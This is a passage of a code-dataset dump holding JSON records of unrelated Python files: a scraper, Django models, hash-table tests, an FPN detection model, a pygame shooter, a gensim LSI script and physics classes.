END.\n#\n#=================================================\n","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":6524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105682365","text":"import urllib\nimport re\n\nurl = raw_input(\"Enter the web link : \")\np = urllib.urlopen(url)\na=p.read()\n\npattern = re.compile('img src=[ \"](.*?)\"' )\na = re.findall(pattern , a)\n\nf=open(\"new.txt\",\"w\")\n\nfor i in a:\n\t\n\t \tf.write(url + i +\"\\n\")\n\t\t\n\nf.close()\n","sub_path":"imgdown.py","file_name":"imgdown.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"62428735","text":"import tensorflow as tf\nimport common.encoding\nfrom common.datasets import SequenceDataset\n\npath = '/mnt/nfs_datasets/lakh_midi_full/drums_sequence_examples/training_drum_tracks.tfrecord'\n\ninput_size = common.encoding.DrumTimeSliceEncoder().output_size\nencoder = common.encoding.OneToOneSequenceEncoder(\n\tcommon.encoding.IdentityTimeSliceEncoder(input_size)\n)\n\ndataset = SequenceDataset([path], encoder)\n\nfeatures = dataset.load_single()\n\n# Run this graph\n_features = tf.contrib.learn.run_n(features, n=1)\nprint(_features[0])","sub_path":"musicgen/common/datasets/drums/test_dataset.py","file_name":"test_dataset.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"441965198","text":"newList = [\"eeny\", \"meeny\", \"minee\", \"moe\"]\n\ndef menu(list, question):\n for entry in list:\n print(1 + list.index(entry), end=\"\")\n print(\") \" + entry.title())\n\n question = int(input(question)) - 1\n\n return list[question].title()\n\nanswer = menu(newList, \"Which do you prefer? \")\n\nprint(\"You prefer \" + answer)\n\n","sub_path":"Training/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"571577438","text":"import sys\r\n\r\nfrom Samples.geocoder import get_coordinates, get_nearest_object\r\n\r\n\r\ndef main():\r\n # Забираем адресную точку из параметров запуска.\r\n address = ''\r\n try:\r\n address = \" \".join(sys.argv[1:])\r\n except:\r\n print('No data')\r\n exit(1)\r\n\r\n if not address:\r\n print('No data')\r\n exit(1)\r\n\r\n # Получаем координаты точки\r\n address_point = get_coordinates(address)\r\n\r\n # Получаем район.\r\n district_name = get_nearest_object(address_point, \"district\")\r\n print(district_name)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"2nd_year/WEB5. Работа с HTTP-API/Home/05_what_district.py","file_name":"05_what_district.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"437852144","text":"target = int(input())\nnum = input().split(\",\")\nnumbers = [int(i) for i in num]\nlengths = []\nfor i in range(len(numbers)-1):\n current = numbers[i]\n le = 1\n for j in range(i+1, len(numbers)):\n current += numbers[j]\n le += 1\n if current >= target:\n lengths.append(le)\n break\nif len(lengths) == 0:\n print(0)\nelse:\n lengths.sort()\n print(lengths[0])","sub_path":"Code/CodeRecords/2464/60619/252822.py","file_name":"252822.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"264856677","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom Courses.models import Course\nfrom People.models import Student\n\n# Create your models here.\n\nclass Question(models.Model):\n\tquestionID = models.AutoField(primary_key = True)\n\tquestionText = models.CharField('Question', max_length = 100, null = True)\n\tchoice1 = models.CharField('Choice 1', max_length = 50, null = True)\n\tchoice2 = models.CharField('Choice 2', max_length = 50, null = True)\n\tchoice3 = models.CharField('Choice 3', max_length = 50, null = True)\n\tchoice4 = models.CharField('Choice 4', max_length = 50, null = True)\n\t# questionMarks = models.IntegerField('Question Marks')\n\tcorrect = models.CharField('Correct Answer', max_length= 1, null = True)\n\nclass Test(models.Model):\n\ttestID = models.AutoField(primary_key = True)\n\ttestTitle = models.CharField('Title', max_length = 50)\n\tquestions = models.ManyToManyField(Question)\n\nclass Assignment(models.Model):\n\tassignmentID = models.AutoField(primary_key = True)\n\tassignmentTitle = models.CharField('Title', max_length = 50)\n\tassignmentText = models.CharField('Assignment', max_length = 500)\n\nclass Lecture(models.Model):\n\tlectureID = models.AutoField(primary_key = True)\n\tlectureTitle = models.CharField('Title', max_length = 50)\n\tlectureText = models.CharField('Lecture', max_length = 500)\n\tlectureWeek = models.IntegerField('Week No.', null = True)\n\nclass CourseContent(models.Model):\n\tcourseID = models.ForeignKey(Course)\n\tlectures = models.ManyToManyField(Lecture)\n\tassignments = models.ManyToManyField(Assignment)\n\ttests = models.ManyToManyField(Test)\n\nclass Evaluation(models.Model):\n\tstudentID = models.ForeignKey(Student)\n\ttestID = models.ForeignKey(Test)\n\tmarks = models.IntegerField('Marks Obtained')\n\n","sub_path":"OCMS/CourseMatter/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"630879702","text":"import unittest\n\nfrom a.hash_table import HashTable\n\n\nclass TestHashTable(unittest.TestCase):\n\n def setUp(self) -> None:\n self.ht = HashTable(11)\n self.ht[54] = 'cat'\n self.ht[26] = 'dog'\n self.ht[93] = 'lion'\n self.ht[17] = 'tiger'\n self.ht[77] = 'bird'\n self.ht[31] = 'cow'\n self.ht[44] = 'goat'\n\n def testHashTableSize(self):\n self.assertEqual(11, self.ht.size)\n\n def testHashTableSlots(self):\n self.assertEqual([77, 44, None, None, 26, 93, 17, None, None, 31, 54], self.ht.slots)\n\n def testHashTableItems(self):\n self.assertEqual(['bird', 'goat', None, None, 'dog', 'lion', 'tiger', None, None, 'cow', 'cat'], self.ht.items)\n\n def testHashTableGetAndSet(self):\n self.assertEqual('bird', self.ht.get(77))\n\n self.ht[55] = 'pig'\n self.assertEqual('pig', self.ht.get(55))\n\n self.ht[20] = 'chicken'\n self.assertEqual('chicken', self.ht.get(20))\n self.assertEqual([77, 44, 55, 20, 26, 93, 17, None, None, 31, 54], self.ht.slots)\n\n self.ht[20] = 'duck'\n self.assertEqual('duck', self.ht.get(20))\n self.assertEqual([77, 44, 55, 20, 26, 93, 17, None, None, 31, 54], self.ht.slots)\n\n self.assertEqual(None, self.ht.get(99))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python/hash-table/a/test_hash_table.py","file_name":"test_hash_table.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"500789255","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torch.autograd import Variable\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion*planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass FPN(nn.Module):\n def __init__(self, args):\n super(FPN, self).__init__()\n self.args = args\n\n num_blocks = [2,2,2,2]\n self.in_planes = 64\n\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n\n # Bottom-up layers\n self.layer1 = self._make_layer(Bottleneck, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(Bottleneck, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(Bottleneck, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(Bottleneck, 512, num_blocks[3], stride=2)\n\n # Top layer\n self.toplayer = nn.Conv2d(2048, 256, kernel_size=1, stride=1, padding=0) # Reduce channels\n\n # Smooth layers\n self.smooth1 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)\n self.smooth2 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)\n self.smooth3 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)\n\n # Lateral layers\n self.latlayer1 = nn.Conv2d(1024, 256, kernel_size=1, stride=1, padding=0)\n self.latlayer2 = nn.Conv2d( 512, 256, kernel_size=1, stride=1, padding=0)\n self.latlayer3 = nn.Conv2d( 256, 256, kernel_size=1, stride=1, padding=0)\n\n self.to(args.device)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def _upsample_add(self, x, y):\n '''Upsample and add two feature maps.\n Args:\n x: (Variable) top feature map to be upsampled.\n y: (Variable) lateral feature map.\n Returns:\n (Variable) added feature map.\n Note in PyTorch, when input size is odd, the upsampled feature map\n with `F.upsample(..., scale_factor=2, mode='nearest')`\n maybe not equal to the lateral feature map size.\n e.g.\n original input size: [N,_,15,15] ->\n conv2d feature map size: [N,_,8,8] ->\n upsampled feature map size: [N,_,16,16]\n So we choose bilinear upsample which supports arbitrary output sizes.\n '''\n _,_,H,W = y.size()\n return F.upsample(x, size=(H,W), mode='bilinear') + y\n\n def forward(self, x):\n # Bottom-up\n c1 = F.relu(self.bn1(self.conv1(x)))\n c1 = F.max_pool2d(c1, kernel_size=3, stride=2, padding=1)\n c2 = self.layer1(c1)\n c3 = self.layer2(c2)\n c4 = self.layer3(c3)\n c5 = self.layer4(c4)\n # Top-down\n p5 = self.toplayer(c5)\n p4 = self._upsample_add(p5, self.latlayer1(c4))\n p3 = self._upsample_add(p4, self.latlayer2(c3))\n p2 = self._upsample_add(p3, self.latlayer3(c2))\n # Smooth\n p4 = self.smooth1(p4)\n p3 = self.smooth2(p3)\n p2 = self.smooth3(p2)\n return p2, p3, p4, p5\n\n\n\nclass FocalLoss(nn.Module):\n def __init__(self, coder):\n super().__init__()\n\n self.coder = coder\n self.priors_cxcy = self.coder.center_anchor\n self.priors_xy = cxcy_to_xy(self.priors_cxcy)\n self.num_classes = self.coder.num_classes\n self.bce = nn.BCELoss(reduction='none')\n self.smooth_l1 = SmoothL1Loss()\n # self.smooth_l1 = nn.SmoothL1Loss(reduction=None)\n\n def forward(self, pred, b_boxes, b_labels):\n \"\"\"\n Forward propagation.\n :param pred (loc, cls) prediction tuple (N, 67995, 4) / (N, 67995, num_classes) or [120087] anchors\n :param labels: true object labels, a list of N tensors\n \"\"\"\n pred_loc = pred[0]\n pred_cls = pred[1]\n\n batch_size = pred_loc.size(0)\n n_priors = self.priors_xy.size(0)\n\n assert n_priors == pred_loc.size(1) == pred_cls.size(1) # 67995 --> 120087\n\n true_locs = torch.zeros((batch_size, n_priors, 4), dtype=torch.float).to(device) # (N, 67995, 4)\n true_classes = -1 * torch.ones((batch_size, n_priors, self.num_classes), dtype=torch.float).to(device) # (N, 67995, num_classes)\n depth = -1 * torch.ones((batch_size, n_priors), dtype=torch.bool).to(device) # (N, 67995)\n\n for i in range(batch_size):\n boxes = b_boxes[i] # xy coord\n labels = b_labels[i]\n\n ###################################################\n # match strategies -> make target #\n ###################################################\n iou = find_jaccard_overlap(self.priors_xy, boxes) # [67995, num_objects]\n IoU_max, IoU_argmax = iou.max(dim=1) # [67995]\n\n negative_indices = IoU_max < 0.4\n\n # ======================= make true classes ========================\n true_classes[i][negative_indices, :] = 0 # make negative\n\n depth[i][negative_indices] = 0\n\n positive_indices = IoU_max >= 0.5 # iou 가 0.5 보다 큰 아이들 - [67995]\n argmax_labels = labels[IoU_argmax] # assigned_labels\n\n # class one-hot encoding\n # 0 으로 만들고 이후에 1 을 넣어주기\n true_classes[i][positive_indices, :] = 0\n true_classes[i][positive_indices, argmax_labels[positive_indices].long()] = 1. # objects\n\n depth[i][positive_indices] = 1\n\n # =========================== make true locs ===========================\n true_locs_ = xy_to_cxcy(boxes[IoU_argmax]) # [67995, 4] 0~1 사이이다. boxes 가\n true_locs_ = self.coder.encode(true_locs_)\n true_locs[i] = true_locs_\n\n # ------------------------------------------ cls loss ------------------------------------------\n alpha = 0.25\n gamma = 2\n\n alpha_factor = torch.ones_like(true_classes).to(device) * alpha # alpha\n a_t = torch.where((true_classes == 1), alpha_factor, 1. - alpha_factor) # a_t\n p_t = torch.where(true_classes == 1, pred_cls, 1 - pred_cls) # p_t\n bce = self.bce(pred_cls, true_classes)\n cls_loss = a_t * (1 - p_t) ** gamma * bce # focal loss\n\n cls_mask = (depth >= 0).unsqueeze(-1).expand_as(cls_loss) # both fore and back ground\n num_of_pos = (depth > 0).sum().float().clamp(min=1) # only foreground (min=1)\n cls_loss = (cls_loss * cls_mask).sum() / num_of_pos # batch 의 bce loss\n # / batch 의 object 총갯수\n\n # ------------------------------------------ loc loss ------------------------------------------\n loc_mask = (depth > 0).unsqueeze(-1).expand_as(true_locs) # only foreground\n loc_loss = self.smooth_l1(pred_loc, true_locs) # (), scalar\n loc_loss = (loc_mask * loc_loss).sum() / num_of_pos\n # loc_loss *= 2 # balance values\n\n total_loss = (cls_loss + loc_loss)\n return total_loss, (loc_loss, cls_loss)","sub_path":"models/FPN/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"164417539","text":"__author__ = \"susmote\"\n\nimport pygame\nimport time\nimport random\nfrom pygame.locals import *\n\n\nenemy_list = pygame.sprite.Group()\n\n\nclass Base(pygame.sprite.Sprite):\n def __init__(self, screen_temp, x, y, image_name):\n pygame.sprite.Sprite.__init__(self)\n self.x = x\n self.y = y\n self.screen = screen_temp\n self.image = pygame.image.load(image_name)\n self.bullet_list = []\n\n\nclass BasePlane(Base):\n # 飞机基类\n def display(self):\n self.screen.blit(self.image, (self.x, self.y))\n\n for bullet in self.bullet_list:\n bullet.display()\n bullet.move()\n if bullet.judge():\n self.bullet_list.remove(bullet)\n\n\nclass HeroPlane(BasePlane):\n # 玩家飞机类\n def __init__(self, screen_temp):\n BasePlane.__init__(self, screen_temp, 120, 420, \"./img/hero1.png\")\n self.stop = True\n self.direction = None\n self.image = pygame.transform.scale(self.image, (int(100 * 0.6), int(124 * 0.6)))\n\n def display(self):\n self.screen.blit(self.image, (self.x, self.y))\n\n for bullet in self.bullet_list:\n bullet.display()\n bullet.move()\n if bullet.judge():\n self.bullet_list.remove(bullet)\n for enemy in enemy_list:\n bullet.hit_plane(enemy)\n\n def move(self):\n if not self.stop:\n if self.direction == \"left\":\n self.x -= 3\n if self.direction == \"right\":\n self.x += 3\n if self.direction == \"up\":\n self.y -= 3\n if self.direction == \"down\":\n self.y += 3\n\n def fire(self):\n self.bullet_list.append(Bullet(self.screen, self.x, self.y))\n\n\nclass EnemyPlane(BasePlane):\n # 敌机类\n def __init__(self, screen_temp):\n BasePlane.__init__(self, screen_temp, 0, 0, \"./img/enemy0.png\")\n self.live = True\n self.image = pygame.transform.scale(self.image, (int(51*0.6), int(39*0.6)))\n self.direction = \"right\"\n\n self.images = [pygame.image.load(\"./img/enemy0_down1.png\"),\n pygame.image.load(\"./img/enemy0_down2.png\"),\n pygame.image.load(\"./img/enemy0_down3.png\"),\n pygame.image.load(\"./img/enemy0_down4.png\")]\n self.step = 0\n self.rect = self.image.get_rect()\n\n def move(self):\n\n if self.direction == \"right\":\n self.x += 3\n elif self.direction == \"left\":\n self.x -= 3\n\n if self.x > int(0.6*480 - 0.6*51):\n self.direction = \"left\"\n elif self.x < 0:\n self.direction = \"right\"\n\n def fire(self):\n\n random_num = random.randint(1, 100)\n if random_num == 25 or random_num == 50 or random_num == 75:\n self.bullet_list.append(EnemyBullet(self.screen, self.x, self.y))\n\n def explode(self):\n while self.live:\n if self.step == len(self.images):\n self.live = False\n else:\n self.image = self.images[self.step]\n self.image = pygame.transform.scale(self.image, (int(51 * 0.6), int(39 * 0.6)))\n time.sleep(0.03)\n pygame.display.update()\n self.screen.blit(self.image, (self.x, self.y))\n self.step += 1\n\n\nclass BaseBullet(Base):\n def display(self):\n self.screen.blit(self.image, (self.x, self.y))\n\n\nclass Bullet(BaseBullet):\n # 子弹类\n def __init__(self, screen_temp, x, y):\n BaseBullet.__init__(self, screen_temp, x+24, y-11, \"./img/bullet.png\")\n self.image = pygame.transform.scale(self.image, (int(22 * 0.6), int(22 * 0.6)))\n self.rect = self.image.get_rect()\n\n def move(self):\n self.y -= 5\n\n def judge(self):\n if self.y < 0:\n return True\n else:\n return False\n\n def hit_plane(self, enemy):\n if self.judge():\n # 获取敌机的坐标\n print(\"敌机的坐标 :\",enemy.x, enemy.y)\n # 获取子弹的坐标\n print(\"子弹的坐标 :\", self.x, self.y)\n # 获取敌机的实时区域\n startX = enemy.x\n endX = enemy.x+(enemy.rect.width)\n print(startX)\n print(endX)\n if self.x > startX and self.x < endX:\n print(enemy)\n enemy.explode()\n\n\n\n\n\nclass EnemyBullet(BaseBullet):\n # 敌机子弹类\n def __init__(self, screen_temp, x, y):\n BaseBullet.__init__(self, screen_temp, x+12, y+17, \"./img/bullet1.png\")\n self.image = pygame.transform.scale(self.image, (int(9 * 0.6), int(21 * 0.6)))\n\n def move(self):\n self.y += 3\n\n def judge(self):\n if self.y > int(0.6*852):\n return True\n else:\n return False\n\n\ndef main():\n\n screen = pygame.display.set_mode((int(0.6*480), int(0.6*852)), 0, 32)\n\n pygame.display.set_caption(\"打飞机游戏 by susmote\")\n\n background = pygame.image.load(\"./img/background.png\")\n background = pygame.transform.scale(background, (int(0.6*480), int(0.6*852)))\n\n hero = HeroPlane(screen)\n\n enemy_list.add(EnemyPlane(screen))\n\n\n while True:\n\n screen.blit(background, (0, 0))\n\n hero.display()\n\n hero.move()\n\n for enemy in enemy_list:\n if enemy.live:\n enemy.display()\n enemy.move()\n enemy.fire()\n if len(enemy_list) < 1:\n enemy_list.add(EnemyPlane(screen))\n\n pygame.display.update()\n\n for event in pygame.event.get():\n\n if event.type == QUIT:\n print(\"exit\")\n exit()\n\n elif event.type == KEYDOWN:\n if event.key == K_a or event.key == K_LEFT:\n print('left')\n hero.stop = False\n hero.direction = \"left\"\n elif event.key == K_d or event.key == K_RIGHT:\n print('right')\n hero.stop = False\n hero.direction = \"right\"\n elif event.key == K_w or event.key == K_UP:\n print('up')\n hero.stop = False\n hero.direction = \"up\"\n elif event.key == K_s or event.key == K_DOWN:\n print('down')\n hero.stop = False\n hero.direction = \"down\"\n elif event.key == K_SPACE:\n print('space')\n hero.fire()\n elif event.key == K_ESCAPE:\n print(\"exit\")\n exit()\n elif event.type == KEYUP:\n if event.key == K_LEFT or event.key == K_a:\n hero.stop = True\n if event.key == K_RIGHT or event.key == K_d:\n hero.stop = True\n if event.key == K_UP or event.key == K_w:\n hero.stop = True\n if event.key == K_DOWN or event.key == K_s:\n hero.stop = True\n\n time.sleep(0.01)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"PlaneWar/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"14340630","text":"def division1(x, y):\n\tprint(x / y)\n\treturn x / y\n\ndef division2(x, y):\n\tprint(x // y)\n\treturn x // y\n\n# division1(5, 10)\ndivision2(5, 10)\n# division1(-8, 2)\ndivision2(-8, 2)\n# division1(17, 13)\ndivision2(17, 13)\n# division1(-10, -3)\ndivision2(-10, -3)\n# division1(15, -4)\ndivision2(15, -4)\n\n\n\n\n\n","sub_path":"python/java_vs_python.py3","file_name":"java_vs_python.py3","file_ext":"py3","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"372654308","text":"#from pacman3.py import *\nimport sys\nsys.path.insert(0, \".\\\\aima-python-master\")\nfrom search import *\nclass MazeGraph:\n\n def __init__(self, pac_game):\n self.pacGame=pac_game\n # self.maze_str=pac_game.strS #[str[0]][len(str)], for example, middlwMaze 18rows, 36 cols\n self.maze_height=len(self.pacGame.strS)\n self.maze_width=len(self.pacGame.strS[0])\n self.walls =pac_game.walls\n self.map = dict()\n self.graph=dict()\n self.edgeCosts={}\n self.sortedCapsulePos=[]\n\n\n def genGraph(self):\n dict={}\n\n xMax=self.maze_width\n yMax=self.maze_height\n\n for x in range(1,xMax-1):\n for y in range(1, yMax-1):\n if(self.walls[x][y]==True):\n continue;\n else:\n dict1={}\n\n if (self.walls[x][y+1] == False):\n dict1[(x, y+1)]=1 #south\n if (self.walls[x + 1][y] == False):\n dict1[(x + 1, y)] = 1 # suppose the cost is 1 east\n if (self.walls[x][y-1] == False):\n dict1[(x, y-1)] = 1 # suppose the cost is 1 North\n if (self.walls[x-1][y] == False): #West\n dict1[(x-1, y)] = 1\n dict[(x,y)]=dict1\n self.map=dict\n self.edgeCosts=dict\n self.graph=UndirectedGraph(self.map)\n self.graph.locations= {(0,0)}\n\n\n def getkey(self,item):\n return item[1]\n\n def print_map(self):\n for k, v in self.map.items():\n print(k, v)\n\n def print_keys(self):\n for k in self.map.keys():\n print (k)\n","sub_path":"CSCI4802-2020-pacmanlab2-ch3-UCS/maze_graph.py","file_name":"maze_graph.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118408876","text":"import os\nimport logging\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.WARNING)\n\nfrom gensim import corpora, models, similarities\n\nfrom TextsDAO import TextsDAO\nfrom CorpusDAO import DictionaryDAO\nfrom CorpusDAO import CorpusDAO\n\n\n\nBASE_DIR = \".\"\nBASE_META_DIR = \".\"\nSERIALIZED_CORPUS = os.path.join(BASE_META_DIR, \"corpus.mm\")\nSERIALIZED_TFIDF_CORPUS = os.path.join(BASE_META_DIR, \"corpus_tfidf.mm\")\n\ndef main():\n\n dictionary = DictionaryDAO(BASE_META_DIR, BASE_DIR).getDictionary()\n\n if os.path.isfile(SERIALIZED_CORPUS):\n corpus = corpora.MmCorpus(SERIALIZED_CORPUS)\n else:\n corpus = CorpusDAO(BASE_META_DIR, BASE_DIR)\n corpora.MmCorpus.serialize(SERIALIZED_CORPUS, corpus)\n\n #for key, value in corpus.getDictionary().items():\n # print(\"Key:{} Value:{}\".format(key, value))\n # Confirm if its populated\n #for vector in corpus:\n # print(vector)\n if os.path.isfile(SERIALIZED_TFIDF_CORPUS):\n tfidf = models.TfidfModel(corpus)\n corpus_tfidf = corpora.MmCorpus(SERIALIZED_TFIDF_CORPUS)\n else:\n tfidf = models.TfidfModel(corpus)\n corpus_tfidf = tfidf[corpus]\n corpora.MmCorpus.serialize(SERIALIZED_TFIDF_CORPUS, corpus_tfidf)\n \n lsi = models.LsiModel(corpus_tfidf, id2word=dictionary, num_topics=20)\n corpus_lsi = lsi[corpus_tfidf]\n\n\n count = 0\n\n for doc in corpus_lsi:\n count += 1\n\n print(\"Length of corpus is \" + str(count))\n\n document = \"\"\"b''\nb\"When setting a form's opacity should I use a decimal or double?\"\nb\"

I want to use a track-bar to change a form's opacity.

\\n\\n

This is my code:

\\n\\n
decimal trans = trackBar1.Value / 5000;\\nthis.Opacity = trans;\\n
\\n\\n

When I try to build it, I get this error:

\\n\\n
\\n Given a specific DateTime value, how do I display relative time, like:

\\n\\n
    \\n
  • 2 hours ago
  • \\n
  • 3 days ago
  • \\n
  • a month ago
  • \\n
\\n\\n

Et cetera?\"\n\"\"\"\n document = ''.join(e for e in document if e.isalnum() or e == ' ')\n new_doc_bow = dictionary.doc2bow(document.lower().split())\n #print(tfidf[new_doc_bow])\n\n new_corpus_tfidf = [tfidf[new_doc_bow]]\n lsi.add_documents(new_corpus_tfidf)\n new_corpus_lsi = lsi[new_corpus_tfidf]\n \n doc_count = 0\n topic_count = 0\n for new_doc in new_corpus_lsi:\n doc_count += 1\n print(new_doc)\n for topic_id, coorelation in new_doc:\n if coorelation > 0.05:\n lsi.print_topic(topic_id)\n topic_count += 1\n print(\"All docs: {} AND Related topics: {}\".format(doc_count, topic_count))\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"module1.py","file_name":"module1.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"3995191","text":"import math\nfrom enum import Enum\nfrom my_math import Vector2, moment_of_inertia\n\n\nclass AaBb:\n\n def __init__(self, x1, y1, x2, y2):\n self._x1 = x1\n self._y1 = y1\n self._x2 = x2\n self._y2 = y2\n\n def __add__(self, other):\n if isinstance(other, AaBb):\n x1 = min(other.get_x1, self.get_x1)\n x2 = min(other.get_x2, self.get_x2)\n y1 = min(other.get_y1, self.get_y1)\n y2 = min(other.get_y2, self.get_y2)\n return AaBb(x1, y1, x2, y2)\n return None\n\n def __iadd__(self, other):\n if isinstance(other, AaBb):\n x1 = min(other.get_x1, self.get_x1)\n x2 = min(other.get_x2, self.get_x2)\n y1 = min(other.get_y1, self.get_y1)\n y2 = min(other.get_y2, self.get_y2)\n self.set(x1, y1, x2, y2)\n return self\n return None\n\n def __str__(self):\n return \"x1:\" + str(self.get_x1) + \"; y1:\" + str(self.get_y1) + \"; x2:\" + str(self.get_x2) + \"; y2:\" + str(\n self.get_y2) + ';'\n\n def set(self, x1, y1, x2=None, y2=None):\n if isinstance(x1, AaBb) and isinstance(x2, AaBb):\n self._x1 = min(x1.get_x1, x2.get_x1)\n self._y1 = max(x1.get_x2, x2.get_x2)\n self._x2 = min(x1.get_y1, x2.get_y1)\n self._y2 = max(x1.get_y2, x2.get_y2)\n else:\n self._x1 = min(x1, x2)\n self._y1 = min(y1, y2)\n self._x2 = max(x1, x2)\n self._y2 = max(y1, y2)\n\n def intersection_AaBb(self, x1, y1=None, x2=None, y2=None):\n if isinstance(x1, AaBb):\n if self.get_x1 > x1.get_x2 or self.get_x2 < x1.get_x1:\n return False\n elif self.get_y1 > x1.get_y2 or self.get_y2 < x1.get_y1:\n return False\n else:\n return True\n else:\n if self.get_x1 > x2 or self.get_x2 < x1:\n return False\n elif self.get_y1 > y2 or self.get_y2 < y1:\n return False\n else:\n return True\n\n @property\n def get_x1(self):\n return self._x1\n\n @property\n def get_y1(self):\n return self._y1\n\n @property\n def get_x2(self):\n return self._x2\n\n @property\n def get_y2(self):\n return self._y2\n\n\nclass Shape:\n\n def __init__(self, vertices: list):\n self._static_vertices = tuple(vertices)\n self._vertices = vertices\n self._normals = self._create_normals()\n self._center = self._get_center()\n self._aaBb = AaBb(0, 0, 0, 0)\n\n def _get_center(self) -> Vector2:\n v = Vector2(0, 0)\n for num in range(len(self._static_vertices) // 2):\n v.x += self._vertices[2 * num]\n v.y += self._vertices[2 * num + 1]\n v *= 2 / len(self._vertices)\n return v\n\n def _create_normals(self):\n v = self._vertices\n nor = []\n for n in range(len(v) // 2 - 1):\n q = Vector2(v[2 * n] - v[2 * n + 2], v[2 * n + 1] - v[2 * n + 3]).rotate90(1).nor()\n nor.append(q)\n return nor\n\n def _update_aaBb(self):\n v = self._vertices\n x1, y1, = v[0], v[1]\n x2, y2 = x1, y1\n for i in range(len(v) // 2):\n if x1 > v[2 * i]:\n x1 = v[2 * i]\n if y1 > v[2 * i + 1]:\n y1 = v[2 * i + 1]\n if x2 < v[2 * i]:\n x2 = v[2 * i]\n if y2 < v[2 * i + 1]:\n y2 = v[2 * i + 1]\n self._aaBb.set(x1, y1, x2, y2)\n\n def _update_normals(self):\n v = self._vertices\n nor = self.normals\n for n in range(len(v) // 2 - 1):\n nor[n].set(v[2 * n] - v[2 * n + 2], v[2 * n + 1] - v[2 * n + 3]).rotate90(1).nor()\n\n def update(self, angle, position):\n s_v = self._static_vertices\n v = self._vertices\n\n cos = 1\n sin = 0\n if angle != 0:\n cos = math.cos(angle)\n sin = math.sin(angle)\n\n for num in range(len(v) // 2 - 1):\n x = s_v[2 * num]\n y = s_v[2 * num + 1]\n old_x = x\n x = x * cos - y * sin\n y = old_x * sin + y * cos\n v[2 * num] = x + position.x\n v[2 * num + 1] = y + position.y\n v[-1] = v[1]\n v[-2] = v[0]\n self._update_aaBb()\n self._update_normals()\n\n @property\n def get_aaBb(self) -> AaBb:\n return self._aaBb\n\n @property\n def vertices(self):\n return self._vertices\n\n @property\n def normals(self):\n return self._normals\n\n @property\n def center(self):\n return self._center\n\n @vertices.setter\n def vertices(self, v):\n self._vertices = v\n self._static_vertices = tuple(v)\n\n\nclass Body_Type(Enum):\n Static = 0\n Dynamic = 1\n\n\nclass Body_Def:\n\n def __init__(self, pos: Vector2, t: Body_Type):\n self.type = t\n self.mass = 10.0\n self.i = 0\n self.pos = pos\n self.velocity = Vector2(0, 0)\n\n self.angle = 0.0\n self.angular_velocity = 0.0\n self.elasticity = 1.0\n self.friction = 0.0\n\n def set_mass(self, mass: float):\n self.mass = mass\n return self\n\n def 